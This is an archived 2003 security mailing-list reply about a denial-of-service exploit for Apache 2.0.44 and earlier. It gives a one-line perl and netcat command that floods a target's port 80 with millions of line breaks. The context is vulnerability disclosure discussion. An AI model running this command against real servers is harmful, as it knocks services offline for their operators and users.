Re: working apache <= 2.0.44 DoS exploit for linux.

From: Paul Johnston (paulat_private)
Date: Fri Apr 11 2003 - 03:52:46 PDT

Next message: Edward J. Aivazian: "Arp records in solaris"

Previous message: Martin Schulze: "[SECURITY] [DSA 284-1] New kdegraphics packages fix arbitrary command execution"
In reply to: Daniel Nyström: "working apache <= 2.0.44 DoS exploit for linux."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

The exploit is trivial with perl and netcat:

perl -e 'print "\r\n" x 4000000' | nc <target> 80


Daniel Nyström wrote:

>Exploit attached. 
>
>No replys to this e-mail adress plz.
>
>  
>
-- 
Paul Johnston
Internet Security Specialist
Westpoint Limited
Albion Wharf, 19 Albion Street,
Manchester, M1 5LN
England
Tel: +44 (0)161 237 1028
Fax: +44 (0)161 237 1031
email: paulat_private
web: www.westpoint.ltd.uk

Next message: Edward J. Aivazian: "Arp records in solaris"
Previous message: Martin Schulze: "[SECURITY] [DSA 284-1] New kdegraphics packages fix arbitrary command execution"
In reply to: Daniel Nyström: "working apache <= 2.0.44 DoS exploit for linux."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sat Apr 12 2003 - 13:54:30 PDT